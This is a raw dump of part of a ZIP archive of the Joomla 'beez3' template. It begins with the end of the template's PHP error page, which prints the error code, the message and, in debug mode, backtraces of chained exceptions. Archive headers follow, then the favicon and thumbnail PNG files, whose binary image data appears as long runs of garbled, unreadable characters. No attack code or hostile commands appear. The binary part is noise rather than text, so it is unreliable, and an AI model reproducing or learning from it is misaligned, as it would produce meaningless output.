								<a href="<?php echo $this->baseurl; ?>/index.php" title="<?php echo JText::_('JERROR_LAYOUT_GO_TO_THE_HOME_PAGE'); ?>"><?php echo JText::_('JERROR_LAYOUT_HOME_PAGE'); ?></a>
								</p>
							</div><!-- end goto home page -->
							<h3>
								<?php echo JText::_('JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR'); ?>
							</h3>
							<h2>
								#<?php echo $this->error->getCode(); ?>&nbsp;<?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
							</h2>
							<?php if ($this->debug) : ?>
								<br/><?php echo htmlspecialchars($this->error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->error->getLine(); ?>
							<?php endif; ?>
							<br />
						</div><!-- end errorboxbody -->
					</div><!-- end wrapper2 -->
				</div><!-- end contentarea2 -->
				<?php if ($this->debug) : ?>
					<div>
						<?php echo $this->renderBacktrace(); ?>
						<?php // Check if there are more Exceptions and render their data as well ?>
						<?php if ($this->error->getPrevious()) : ?>
							<?php $loop = true; ?>
							<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
							<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
							<?php $this->setError($this->_error->getPrevious()); ?>
							<?php while ($loop === true) : ?>
								<p><strong><?php echo JText::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
								<p>
									<?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
									<br/><?php echo htmlspecialchars($this->_error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->_error->getLine(); ?>
								</p>
								<?php echo $this->renderBacktrace(); ?>
								<?php $loop = $this->setError($this->_error->getPrevious()); ?>
							<?php endwhile; ?>
							<?php // Reset the main error object to the base error ?>
							<?php $this->setError($this->error); ?>
						<?php endif; ?>
					</div>
				<?php endif; ?>
			</div><!--end back -->
		</div><!--end all -->
		<div id="footer-outer">
			<div id="footer-sub">
				<div id="footer">
				<p>
					<?php echo JText::_('TPL_BEEZ3_POWERED_BY'); ?>
					<a href="https://www.joomla.org/">
						Joomla!&#174;
					</a>
				</p>
				</div><!-- end footer -->
			 </div><!-- end footer-sub -->
		</div><!-- end footer-outer-->
	</body>
</html>
PK՜�\"
����beez3/favicon.iconu�[����PNG


IHDR�asRGB���	pHYs��$iTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/">
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <tiff:Compression>5</tiff:Compression>
         <tiff:XResolution>72</tiff:XResolution>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:YResolution>72</tiff:YResolution>
         <exif:PixelXDimension>16</exif:PixelXDimension>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelYDimension>16</exif:PixelYDimension>
         <dc:subject>
            <rdf:Seq/>
         </dc:subject>
         <xmp:ModifyDate>2015:03:15 13:03:46</xmp:ModifyDate>
         <xmp:CreatorTool>Pixelmator 3.3.1</xmp:CreatorTool>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
>Iv]XIDAT8}�]h\E�ϙ�{wﺻI]m�XClK4�RE�w-E��(->�f|)y�~(Z�"ȢA�R�h�Z�B46M��-$ӆ6&-k41����c�xn��S��\����s��g;^��t}�Pc{���յ��
׽�uQ��{VJ�5"I"�:�����X���7���O))����:L;�j8�lQ�P ��%!��럒|2��qye��4��m�m<3�@�!��$�+c粒���J�ۤ-S�R��Hk�A8$��k���
)��[�O�/�ov,�6�˔�}�O0|�
��n�����N�ҀF�{Ӂ�{ǽLK�)��{�|�G�� ʭ�"W���?��X-����Y�W�~Rn�2�˰o.� x�*S߇�Kê:
�4`DF�oԝ.(Y�&pKq��ѵX�n���9�bbn��|��cc�N��ݛZĴ�&��ܖۑ�t�B���Trj]ޱ*�Sxqd�w?��	p�|���n�)3^E8Y��⑷g"rU`Wn�A�O�5���?�H�lpY[��Q8��+��]��r�q�oޱe��t����j	Z�G�O\}�����r���7�wَ�C����V6t�b70j�#Ū�!��_WH+��R����F&/������Ϗ��j.9W���xZA!�/�W>	`[�X;���GP���w6�V���R�{4w�e��WD�0�Α�h�������Lȣ��%J�Л��z����=i ZϰŠ��Q����^"���O:58՛�k��~h���l`M��ǽS�qV1DZ���m���hb��w�yu�K����o��;�������DS(IEND�B`�PK՜�\�Yb�U�Ubeez3/template_thumbnail.pngnu�[����PNG


IHDR��� 	U�IDATx�|G��e�d�ljf�r��Ü^���23�]�p1XH:fǖ-K�%�����η�s�{��K��o����aY�뙝Y(�Z�V��;10@�H�f��}�Q�m�4}L�p8l�ۿ����iE�YPd)%J0��F�b1��h���e6�u���u��E�����E�9yy�*�b�n�����}?EV���㋳L,u<=��K�Q�˒m���D���@,%cbI�M�aI:�K�(s���	��#�d�dd�޽3�8�$|��<�B�5�M�=3�L�������eY0���m��AV�	6�m6���V}�&�e���5o��Iv��@k[�X]��n��)��	e!I<���ng�v>�	��α�YFR6y;�a�i�XLa*ʄxT9kRy��9..��O?���?���,ty�.Oc0)6�y�g����)̂�J"��(J�k׮#F�W��@L�A4�o�jy9��9�ljnm7�a^T���R�?����c�xcG��v6Q��^�m���s�DbɘB�8xGw��M)�2$<�-;���
C�<��*a�����7j�p�;v�{�OKyEŞ�VT����[�_�j|� �ә�~-�>��ӑ#G���O���N�b�ÔmhN��莦�&RF�Ȋ�v� ���40���A����d[y��ǥE�eUM�i>����@JFN�2òC×'��,kD5�ި��*�0����1�s�K�0!�IO�bB�KB��U����0T30T30T30����+P����to���a��kC�4��o���1>eO;!�֫��ѣi����zZ/8a3��~�A��G�0T�?BH�$��իژ1c0Ɓ@���c��24�������2����CZ_@�Y�VU�RU�ˆ�X=_L�����9������(���dd�~�mE}��>��(��!��&�iJ��S<!��TU�C�JF�3��W���PM��ϩ�G5�aTU�8�a�o�l�Y
)t�XN0���z���Δ�B1�.���)���1M[m6U�ɴ�aK�Ҙb$1�e��8���(�=������*o2�B=6�U��iFW���4�D�x���e�ѽM���jX��]�c{B�$�*YYY�U����y�$Gv�3O)/۵��#�#�Y�e��2��E�_�l>Z[���=��[kW����X2�����<�q�����ڐCP��4����m�4uvA�#����<k~�$I5��(�z]�?dU�\��΋/m=�q�EM�>���i�.-,TRQ�_ZV�N���?�U3v����������q�(F�?���9����H�li�[���Ӓ(�4�i��A��m[�,��,����ti��'�V�N�o�5~���~��w��͞1nt���3��.<����g�������U�?XWw� �J��lK�7���5�:�%���Jv�:8�jP�
��t��Yv��\��y��P��Zx�SC5��}\5��ӯ��,�z�]N���!#gzb	��-f��*z��#Q�D1i6[1g�AD1��&���M��3��D<N1�%Ma�'!Ͱ<�'5��>(
w|NW��(�G�Q�l������3��ID�R�]�h,
�9�j�
z��5�)��A��O�Ў�����!0Ea���PL%Лf)J�rFA��kzc�	��%C4�f8���{���<�W#��Ri���@Ψ��qKz�9��H���q�%</қsl��hA���Ww��"B@�~0ƺE��ݜ����j��`���N�n��
����|u4z�|u�T��S']_�
�'�3
�Um���Fn��D4ƚ�'��,���ǩ��!�-�+F5$Ea�4��	����~x����vo^V�!_�:�Ri��v�
��Um�ĉ��lAnp�	 �X� ��k�U_�4P��~)�o��	��
����lP��[
}|L5IV�G_��,.;|��u���·�9�H���hr�	�ɡn��
�b�,[iBS�o$z��%�
{��ڨվ�D�G(��w�i���:�mE�rK{���R�b�Ki*�B�>o�fp��x;_5���_6$b8�1>�m�
%��L?�48֖��m3T;�}	:�IO9���{<=�8����
�+��t�ᶉ�
����6�;�j�r�L���9+�����d	!t�(
�ʔ��y��c8��
2!�U�~�UCKiQ�2V���K�b�L$	 ��D4�x���,)�
i�S�AJ�R\Y�x]Ok��p�4`XRT�����o=:RpK4�趝�j�^ò�L�_v#^o��<"$-I����w�L��{`��T�S�Һ���ua�����i�lU�Y�o����4�dUK��7�ߴ`��s7DC:
@39n�b���z�u�XKD�N�`ςh�?z�Nٿ~����*-��ۖO�0n���h�*��X��Tꦇv��.�5�n���^%��(�U��{SU�'e��Q�I���l[s�
w��[:d�P2��u�$�<=��&���C���d���d\9��YsO�n��G��`՚�1o�SO��7O��+�/Ys�9��M]U�k�/�u�=��j�4�{���31�j�zl��N�OՃ*UO3E��Uр�h��>�К:/Ev�V����1��kI�('��gٕW������g{���T��M��n�o���W5~����'vo���r��U>�w��-�s/��t�y(�+�z�W]}�u7Ԓ!^s��YK��B�2T;�!�F1��pw���9���04���5��s�p4Rd���s�Sw9�Z$���Row;�k��P{��$��U+�վ۫Z�#-��_y�5�'����_���g�1,g������j��A�՛����q����X�G�=kȈq�����㖌{|�t�ϟZ�va<�q�m7>��?��î_m<{�MB~)���`�yL�C�~�X
!�Ӆ%Usʷ�yuэ΂j�bf0�zmmw~�H���4V���ӷ���H`;�t�^8�ڠ�u�9-*�GT���%�[8��ݝ�G,Y|��'�����m�o�b�e��|g�C��{Ƞ�ﭺlŝ?:�ʵx�x�]��b�AeBj�aߵk�۱}�5˞{��߽Z���	?���<ôo0�p#f���&Y��Z>�s�G46{E�O���ɶ�U6�����@to����PTBvh�ɦ�����mG>��6�b=��6��Z��Ï��[����������x��p���}��/>�xɸYnŻ��?��+F����׏|oz񸉓�|�p�¶ay�GqW�[���������#���˗ξ�G�2;m,B�)  �N�3����G���P��Ъ���d�Iz��/�8�G]n�z�\q��~TT:�l~��k�����ǎ�V6�R���I���Ϳe��d���~v�Pݴ�nZ3_w��?���L�x醕�K��mw�2Hg��?��Ǟ9{�i��g�~�싗E���r����ޟ�y����Z;�~k{�/�3�w=����̠Ue��y��l�����#m����H�E�ۘ]�j9
�L�D�tSS�G-�..�~�s��'.���/�Nb�X�,fH%�3��91OH�^���6�3��
rtr
,N�B���1�Ҋ��,��&+h2�	���� +�����
.U1�p�Y`L�4/���7�\|YOk;D<C t��ZL���3/�t�����@�eq(����(�Y���a?����&,�,N�g�z��ht0E�QA��߿�;K⵵�����lVZ�
�p��;M&%��c�d�dd�q��0�NX���2�}!Ƃ�A$�<�m���H6�Z�Ô2�Õ��o��.]�f��1Y�(·g��8V�|��Z6q��8�j�z��x��e�=�}�����%I��&�Yv��?������ia�' �\]R�.��w�2j٤����f`���l���_<�+����R��4M��\�?�)�[QD?���\R�}N�����I�f`�~M%[L��j�{�Z�C�>��2�18)�	?�.?*�J=Ӑ�I�Kfʹz�g@T���d���A�mu�ӦW���t�G�n�0U�]�\�-�騚��D��}���Qm�@G��i���̤�i~t�ϛ}A�9+վp��Ž�8���2��B�B��m�L6}���ev��j��'6��Vm�▎�f�4�Oґ�vzn�ͮd<&��Q�l�Zg��%T30@$Iȴi˯}{��#M���\t��u��h{�{��.�3-��ڬu~_7ͱ��a��PD#��K��3�E��,P
)rFLI���X��Ո���t�:4=)J�q�/�<�W�ro�W4����&�AB*aV}��~�ű�<L��_�B��p�*�C�ݼl���j�s�Z�*�*�s��w����ƺ���n�x�e��z‘��,XM�A���j�`�Ĩ�{Z����m�EE�aM��LC�X��`�i�ɶ����H�Ýa�p ) � ���jo}�/M�^�$��cgr@��r�ph�E�� �c�d�_�6a�\S]�ֹ
�]���ؾj�Z2�H8}��)DRi1��d%����9Y��ٱ���e��.������Ek���`�� �J<)2Xk;�࢙V���PU�T� `
��vo�/*ge9L4�����޳Θ�%���̌�yK-X�"��h[��fS�b�j�N��$9��b���FE
��jf�)���l�n5[y0���F����a�Ox��������$���+o[9`Y�O[-��y�+�h߆�gkRr��Q�J]5m�]
&�}�=�GW�[J���]:.�`�?g��D����T<5o��\�]�-_v֫/�7e��Y��~�,�Yp�UU��ʡ�����oh��yE}�E���BdzU��Cm[����3斗�=��Ț?wl~��iWCd���.E8kVU{���%n<{H�ϟݾ�������(#GNN�O|�冎6DQ f��ڊ�T|���#m��8�貏�֍�*��m1|��ÿyz��UZ���C�[����rP�����es~a[�3�,ۜS���en��Ѫ�3p��wr�\��kt�Ġ��ƈ�-���!�N�=T�Oŋ���l�sFm��;{��)�;c|{(5utEss[(���c�V�8	��^8�.Kw?�z���dƨw�4���hv���9C��k2��h�'�|�"_�9P����":���H��lȞ���CDCw�h��jC������A`���O>���9
#L3K���1l"��YL���K���1x�$R�.�E`����p���y��
0�W �(�z'���L�>n2-R����/˦dU�%И���o��y�݃��Na�iJF�g=
XR���;/�z���*���c۶m۶m۞Y|6�����k}NR��'�Z�u��3�o�v�`'�U���P���K��?�s�xQrA��� ��Uټ&�FGכ��2Q@��=���
S�F����D3 :q�iYh�/D����M�.�ޱ׽����ߨ�N==8zj3
׽�+N8�̃�R���r�j����"xr��U�
2�x	����S��8��F��[HK�>�ƦDb��������/s����)S"䀵F1��H f*^,�Q檬��]�f�a��N�ob,�H�΅��Zh�x0$Mk4��M�K�]������j��+0Q���;���瀊kb�̒�,I}L�Zh"̺�j3��F<���c�,�G�����W��g�l�q��b׻�Kr��^c��˿w	�}��s�;IY5'��y�c�)gi��'
"^�W�a��ƒ���u����Y�WT�i��Qrw���/��:.�������Uc�ֺ�ź��� h�5�sj�%8��#�v�����D���BeR��Z����� �J6�$d�!����%KG�[��7|���eu�oZl��}�{O<��C�-�U���|I��
�H�zdŐ�IeS����KnL�;�( L9K�d�$�Yr��i&I�Eʮq�H��;�3��Xmj�|���ƈ4#��
��C��#�ݍäQ��%k��D�I��7�<ONS8��M�DžU$�Ǿ���:��u��d���	�a��ް�ߍ�����z&�hV5��[��@Z��FB��R��]�|��]o��G<����ë]���;���?t|�	�;����9H�$}�#��]OGn�5��M���*Z���,��UKYnQ3-t��B3�;���M0�Y�ƭ֚l�Zo10G����‘����у��K��jI��4�yPO6*5�;-*M�\s$�
�V���k�J��$S�T�ق[���qT!aJ{#�t��������T�0��+>d�5�ơ����5#|�&��,�L7ik��i?��K��'����n�W��Գ:]Bm�m��h�����Eёv�pu��"��xc/��T��n��yM�7DY�<-e��`e����&�Q����+�e@[T��Ǿ�c�C�#���X3��}8R�94K��6�#�+]���/0-�XhJ$i�R]��@�۲���֫4�4�w�ڦ	�:�i'�:M�u{.;��*=�bK��ETj��@}��$����V(�cp��6Q��X2�\+�s(�M�y�
]�q?_�n?�	]�o�ֽT�3��z��w����k?�u'�t�~5��r�'ά�]C'��H����c�qƞ��8���I|DqțW1'[�	�"�H��6�LX��b�*�R�+�
3X�B��SF�4�!���x�]
���~ؒ�"H�=7T}����Ye������&>q��Œ?�Qu��lj�#e-Mk�M�D�z'�*�tk�P��V*k�y�L9������N�t���H�z�8xEo,�Iv�ǰV2���|�=6`R�!�w���{0
�F5ǂ�����p����u�֖n�����3��9����v�6	�",C�x���"���#���6�K�c;
%y�J�H���lK%��Y)�u�ui��D�w��i}m��(T��v������싄��8���e�.�:mJ4�Yb�Vi���]{(f��u*+�ʳ�[�m��Zf�0�V֜��DgȰs)Vsy�/mY[)M33tCQ�-���H�q�<gۆ��u\8^�#�o�T+�y����t����_��Q�m�<��|�Y�Բ^�R��Z�6mn�iX����tg�4F�3�U�[h6H5���u���Ռ��jV�c�c�ц0��H6f�s�~�INm�;r�g/�P��q1hLz�Ќm�p�s��b�8
�]�4!v{%�k\�CG�#��fR��us��L0���ѱ��kF�z�1�ɫǨY<Z�Y�I3w{�ܕ���M��GDsw%�K�U�m��nj��/���֎�N����3.���=�̀�wH���q��Q���ޱ�@kYϗ�ˌ�|Y��v���-��1q�w�H� �V�V��aS��j�ZD�P����W�n,p�;HD+����t�:��"��ďc�Z/��dp�OBxn�ma��1�^�'<A4�@}�4#*C�
�����8	�t�nWslE����� ���s�EW��e���o���p�����S�9����H��BM�������Xz�ܙ�@G��"�n�md���{F�{��0�p|�|��q.��P�e�9�hy� ���{�@`�(�_s��9
��8Ǹ��:pc�Ƈ�9F�n�E�{��J
˚$yD��غ)'7N�V��Z9�R�c�s����9=8��@Ԯx�[���u��N=g��c�0�XT���w0�����~�\�;�"J��a��oN���CWbss�i�~���q��0�Pc�F���j����?efå� ���Qu,����G�G�ѭq���}�Q͔�͌(�!:�R"�G�lraC"j_�
���Wo�*�����p�9��?:�^$Ăi�Ib�"�K�)٧�ᓽ�h����`7ĽU��ɾ]�|H8�=+'�yІ���E|����Ljh#�i�[�2Z����=�OQ�}��=��=��)P���Ԯ����s�����I�$�c�|��}H�3�g�D/+8_N�gH�,R������;T����G���85�`v�c�.�yQ�\�W����G�V+h��_56��]�/��>��_��7�����?�=�rv>pL��M?���~^
u`�O�<3��L�y���6�yš�^�gĢݦt�1��@�M�[�О^� bDx�)*��g1k�6��wс+>��0P���>z�i��a�a3GlU"��������CݻqF�Fg�X
���K�!�8�G�nF����p��8<�e�L���_c:g�jW<��Ͻ����7����ON.��j��O؏��q�Y�=��=a�@J��a�w�z�(?�F���Ӗ�����������%�ɍ�$c00�`E�-�_������>�{i�B�qF��L&.�&�ϹG��g��	��J^�O��_����Z?9����y�jJ�'�#զ��t]{��Z�#զ��5M�/{�&��7��v!�Ne2�"Q�|ϕP
��i���A�i*����S�4����$R)�Dxy���6g�9;�Ȧ�Ν��=��/}�F$3q�ءR������t1o��]���w�4�٪�Ju+0���&��x��{��*�ߩ������X_1y��y#��eS�|nm�b��L&�֫0�,��w_�;'P,?���y061��T�co���Z�=������|L���-TR�X���E�y���-����P	�v��g�ϡ�{<qv	h�jxk��Z˹�-S�Z�3_>���}���߮;���swt�!���mSY�����f'�u����=�O]\;��ԓ�ϗm�u��x&�J&z�1���Zm�=���US�휱�0Ư��=j��U�P m�Q�P1�!��i4���f�j5�!)Vd�4��s�%�#ah���ǴlW�D�\ƌz�!ɔyP�	�AD��!!�8�`����<O���߶(�!���W�=������}e��+> A=��"�P �Ml��Y��I`�&u�~��~��[])_䔣CC�Ϯ��\���Oh�@`��P����`t��X�b/P-�AӴ(�^� ��,�W�=�˻�?���(,Vħ��ަ��DŒ�/�P�
�O'{�Pfn:��Eu�0 ���l�|?8'���i�:�����48��-ǝ�����N�о��	��ݍf+���/P�R�����B��j{�ǻz2۝�]ތ��$3۱0T�R���Ti7���R��<�%У��P�,��b�
�<��Wq �|����s_o�1
��m��9��
O�����1l�U���#Y$/��B�wrf�/!d7�H�3�S�-����Q�1�9����=1����'4�����]YkZatd8�n;[�?֗{���³O���Y�Ǡ� �X6�N���g̎�C��f�m���b��0� ���_�&��d:�D�ى��҉uU��B�5�I�_���@�:� M�Jw��T�@+�!�EP��k�q<jh
��x�$����ڃsǷ����۶�HB̚�r���Po�ٶ]��[G'�E��n��?w$s˫��2�$ͬ�;-�J`8��&��?�E��Y!ձ�5B��(3����8�T��D72�2���.ჺ�w6C�8��$�Mj��V�.�W/M#��]/��\Q�K�>ueÞ�.l6'FG���n A�k_�ν��p1u��J��-vQ��@D��V�z���]�+��J���0n��\.��&�Ԭ�u�v����d�Qm�n�d3��G��8V�'��f]S������>���f��^Z�}9�
�RS%�W�P��Nڧ+I���GA��We�T,tUmץ�:50ԥ�_][�)h�Ѓ�����!���"�(!8SP���դj�\��n���W
"L}��_��r-80ڽ�Z3�=�Z��tIk��p�O�տ��w�����	�8�Ѕ�9R^rh0�|�S_K�;��>p���ET[)�|,�e�g������כ��

�E�O-'�ɘ1���`����?v�;_�}�Ȭ֊�^�lJ,,{AH5ұ脂4qE���̀%��C�!X���~�[ȍ��m���ZhTD�8�Dk�'0�쀆�k�TF|\�}Wuy
�������C/�j7�V ��������(��r��F"�.�,]��4AĸЁނ����Vm���#�E]��(���ⷓo#����k����$A{T{�;/|�b>ݝål���Wj�L2�;�s�aA�)����:0/A�)�@�����ho�A�����o�+ι��rc=m~�0߲e�|����6�	x:���7z�R&���KN��H��!��s�1y)#~g��B�s��v��$�g�6Y�����ܱ����$�Ŵ� (�m �
7LEQ��I@}g�h\"
��z����t_imu�٪V�適1�[���+��g5�=��� ��@�VB=��N1�5���l5
�����^��w?���?��"\��Fƽ@� ʌ����@b�b�H�"���	d��L�P�����vC��"F_��n(��O�R$���`}Q��8��۽�gU�`���N`{�7���Оj��y�����De-�Y�ز����&����CY�Se�j3΅$�ih(�r�Q�����UwY��"E ���x ��������L����	�"�L	?���i�oV>����F��ot�x�W�VW!^	��PR�n�m�;sB0���2��g��*8�^eeD"�/����?�����'|(UV��*1\V�`#���4A��Q�	�@с�.PH���P>@��3s�"�j:���.'�~S꯳А;��s�!̼@�b�I@%a|UH��l�B�y�֣���]����r}��㵶�g��y�I9�{��Ѯ3'�*��fmn9xhr ��pI2.{�cF����3c�%Jqqll{�x�M5�F���C�~�{M���O�%Džf:&���R#��L
w��66�ʱ�(
k�C�N�./.���DBjl�U;0�73�.�ӛ���J�^�\�˲�L�t%�h�,�MC���tc���@����\y��?1�+ty~���ʥr���X�	6+�B.��0+�\Ю���Ç&Z�JGRK���h��e��<9ޛ��?�p�g��CݙD<�/�z`�7��d9����߲�B��(��
�P?�.�n[�BGQ'��m�oTI4�q�7�o;��m��媋�m�������%H�PA�I��P|����;{�������/��@Q���)l��GB@Y�;5 #�1�2F$A���Rmie�ZkQ��36���E�޴c�c�O�(]��H/i9�/nK]�Bo<t��1fg�,�։c��.�_����Kݝ�Չ�ág���ᑁ٫sr؜]p'n��ȱsg�+^p�-�<���h��n�7��|e��\M��c�Y�o�x@�`߭�(o�����g7��u{�E2ٔ�o`�ĥ�#���Ν�����S"V�ܾ垻���O��uo��}�_�?�'�&Jڕ����|�վ���O��A9����O�KٰZ�J#$hM_]Z��n�C�}���|w�
J�]hj�>�B>�{�y�K�*h���M�:� y:�b�����P�.��t���*�4b�F�*��O�ӱI2c���RܐC���eن�?Rf�v:�')b��y���W'�&T�O_��z'i��j�������-ۋ�L�H;U�õ�%A��\J�
qNCE�\��A<�����R�^��i�� �tyf�rw�OE`����8D���N�7LD��0ve�)�Q�!"��ð�q2�`�A	F!�����r�(��`h��F,.A���U����8�� ������q"!L�ܝb��v:�٭}�L�d�!C�n5�X�[�nfr9ױU݌X�q}E�$E�A'��`�q�T2�[L�Iт ��Ɋ���v�J��2Fe1C� BXrlY�&���_���*���k-���i
���j<�1����~
w��,s�������o��$M��]o����9����yO�AЄ�,(f*�V]�'"���*E��(:���N9��6^2�t�O�<�m�8���Ź������⅋�{��u�n�O����F��x��t�L�n���0�ۂkB.�2!^HמYr�HS�q˫�����ڵC��n��{R!~�|�}�~�+�pbh8�J#m���&%��"�s��pA09�����7!�p!���eG�#�8��LUEf`M鄌��*dK'
A�v�ḮX���5���o�9C�΁)�WMQ���Шo֪�R(�����Hg���o�C!���s�\1�l*LD����!�ث���������A/�̖�X}�̙+z��m��77ݹ+�8��� 5z������}�mϜ8Th{�J�~lru�d��s9S��-q�=7�z�x�ԉZ�������
4�7�m�hac���ǚ
�j�-����E�)ţJ����#���7h��B{�:���gg��ԕ
��5���>y*����S�_����g�����+�l��rM A_���:QF�.sp��w=�f.=c����
����'����$�X
�N<i������4��mAkA�m&�
�c�)(�e�M�/�t���%C��Dp!��|U�*�0uE�dIpFX����Ӊ8���jB��Wm��ܓg/�z����7~S�'�ģ�׌|���gu�ᇾϡ�&
2�`��[��.�
v|葑�q���ZƝ�\<b�B���2�P��}�\y6�7�ޕsg���M]W>���X�G��d#y�…�o9�vu�������
��2@�kZ���������
��Lv6[�#S��է�x6?8�>Mt���yy-=v��C}��#��/��z��o~�s��k#P;��.��U�`��xY�>]���Ț��w\�i{u(�R>���-�l�,(�	#��Ll����}P�����ȒN_�~h.-jۅX�%��/������'f���e?隸�-�%�v�v[�,h��j�.��8a�;��K~�Jg�tg4�\h�vx�g�Vˈ'��� #�� �,���u����H��<�u��?���}��N&��z²��ֶ�Ő�D�QI�磨��p2ի��\�V3�°Y����Ӊ����u��=
w뽣Ý�k�(X�%��%��a�����4'�4�$Vk �RG#w�#�n��<90B����B��x$I������p��4����ػ��N��J:`�F�'�J�:��(��،c���\�ؘ��`d�K�vǙ��+yC�4����ve"-S��O
f��3H�]��4�8*���(��6*�i�T%��\"�k5��C L3��2��G;+�c%D�F��z���A7���?��ǫ������^��RhJ�փ@�p%�0/�c�����lu��ҒD��C-׮n�4m6WAts��@2v�n������S����n7!�uh;`1UW9�iP�B�dNpO,�F��UC����KK+�U�{Q)�7��h����gw-��앥�jft<�.V<��x�)���7ԅ�=>��>r�3�>�@�das��0we:Di<�::�*������3����B�t娪�,����4N�V6{+
T�Z^�R�𠞌?�U�[R��9�%T��	��$!C{�QM�¥������ٶ#7������ͥ�z�ѺKجm;8�ol\ѳCw�|�S	��Um��Z�~�~d泿n�@���@�-��rFe��A>�$��ډ��>�ܝN�����t��J�3��/cJ�������x�ժ�b�ܳ�v���Q���b������)�h���%1��/�V����_跼��.v�&/��9�
j��*"�jT�D6(<Ƹ�y�����!�ax��@t���щL2��x��|�\�HedY����Qc{;��+I�%U��;�ٙ��q�{r<Ý��d&�py��ɡ��0,���IUB<p� �7��b1��Kš�l:��ʊ��Y�4UD��p�"]��+�=�c2W֛Bb�����D0���_���uiun�E���@R���d�ƕ+�XKs1L$UU=߇��d�-Y10�K��V��mw�1?�S����O�̚<m`����M��o/��x���\Ǒ�"�|�%���O9��S�� +��)�q#19<����+�5�
�Cۏ��LӦa����0д5�����ݕ�_6���
��i�(r]ww�S��|�+��A�R��͍��vCd'G�����-~h"{�ܥw���@�o\���u⡯f��-���r��RA_���)1Ѭd�o���o�o���ɱ�G�Zk�ЭϜ9��FPә�f�sqnu�֛J��H�SO?�9������6��@�ֹr�\f⎷�uˉ|����ho���Za4��6�&���dž�.\�Xf�[���O6H��㮧���Fzb"N�>�6| ���v��Y}�ެt��u�=33З��]�fJei�Э��|C�g��r�'���Z�Y]�5���;�j�WW�\\Z��Cq^nz���gU���?�A~��3d�_)
5���IX1�v����G�1�Ed4�(M]t�^Y�w�
ݲ�Ƞz6�
 �Oo*�I�\]Y�@b��sHx<J�j�R��}	�����Mv���*E�qO\�v�
 ���ݒ��?��Dڵ�t1�BH�p��KlB��;�f�\�5#�H�0*��v�{`8C���Rw{{Ոw�T�\�@WI�>6��R�RO��g��`���v�s��U�K)��iP)_ȩ�ǒ�
��i�7��SHǽH�jKhjWB�V�'��߱:�vo>9��,��*��o�Bd3ل�\��h��C��r��Rf:ѓϵ�˛67IE$�Q���[8��/��ێ�k��L~a�Z�͊Fy�I	Q�|2N��]6�{u�ǴQ�fu�FjW!�����Ձ�֛K�m�Xe��*�2q�<������-�O5���bR>���5�1#�t=�}v�J��(�AGBbH�"�P�X�_�nB[���E��K�^t�!��SM��P�"�G��"&�u����+�/{q�v`^8w�
���;�כ�v�ӄ ��vۏP2�8�6�������l*��4EF�VKVT}Gܽ�ګ����������y&pЖE%����+�%L��J��0%U�h����s�אE� ��� ���tl�ʍI$�i�<��#� ��z�($�Y��!d>�G�J俯��%G5Y�/=�����Z��܇?x��'O�8޸��o��T�u��6St6��{z�|����HW,\\�TZ̓GL��4�u��[�\
f�L��z�oxT%~}�!�-\����8�U=���S�Xj{l���5v��H����!�"�����[NP�ۉLf���:+K�J�}�y%��l�<
�b7� �D|�)
**�p�8Q��C}�v[U�J�Ng4Pۥ��|"���#?Ċ�J��mQ��8�z¬��L�\�A�c��yYS;�FĘ�ʢж,߈'܎����y��ںtu5��J�$Q��W*e���sVU�Ð2�teR�3&���������I���4˥��j4ɲ�C���&�����Ypc��ӆe��O-�{fSi"�KV�r1�y�$�G����k��(��@E8��%���:�$EǺs/s����psie�-N
lmmqIC��J=c�q�\٨ف7=2�1&�2��X�xq�H
1@���/78�?�j��+?|��ᄃ�:i3��;���'�$G�{�G��D����sׁ�}��4ݝ��*�t��/~�K�B���J����a�ܓ�� �5���_��5ў�Z��0�:0��
:+ՁLn�q=f��E��''3�r}Ê���(q�8ظ2<4�;�����G��֨㎳�7\��jƎ���c7߼�U��x��8�+��ãb�ª�fAO~�m��7Mv��^��^=I
�ҳ�ٳ��k0�k�z�*6*���V�����~9^�,�r�u��Tke%��^�Չ��\� �f���VCx�
��J��y|���§��;���F2ng�-��w@Q!$��
%L�9F߂�	�>)�G�XN'�B�e-[���u�����&�"�uMm9����V#1����l�݅�˭Ո$#��Tx�?IX;��v')�%v�x@�/��B)�<RU�u]���*�S���8��#�� ����GHڹ	��];�a(+Jc�<��hgq	���C�#B���	�ȣ�P5�OAp���`\R���7�����IY(ɶ:#MU��I�D0�a(I�$I����͕yD��f�A�"���Դ�XLw�Ј�u�Y�!Bv�NqN)�TYf�B�	�/�~�O~�7r��Yw8����,�ʄGJD&<Z�ۗ"�ejGu]4�gM�(��ˤQ˖ۊ�Y1dm{
$֚t\W�u���;�49@Th��B���`��(e(�����AP��/���" ��
��ѵ���z��o�W�N[j�&�K叟��;I@
�"����IS8�5
�
���6M��V�����1S~@m�3ѳ�+؍��]�ꞴÙ�sin�d.��DV�#.�m ��C�K��è��s�0�A�b#�ED?湆�0J1� |������k�$/7��{k�Y.����b}c����ܬZ��!Ci~�z��	S�\x����'�d�m���x�8A�Gy��{��"'����.l\<]��/5���H�C�Cg�yBJ�ȑ���H��m�-Tc����lOc{�nQHdj5:r�<����!��b1���������+��ȶC?�r/%C�nW��v�-�Y����B/�/3��xM��c�4�M��,U~�KIJ>�Z��,��NCF,8
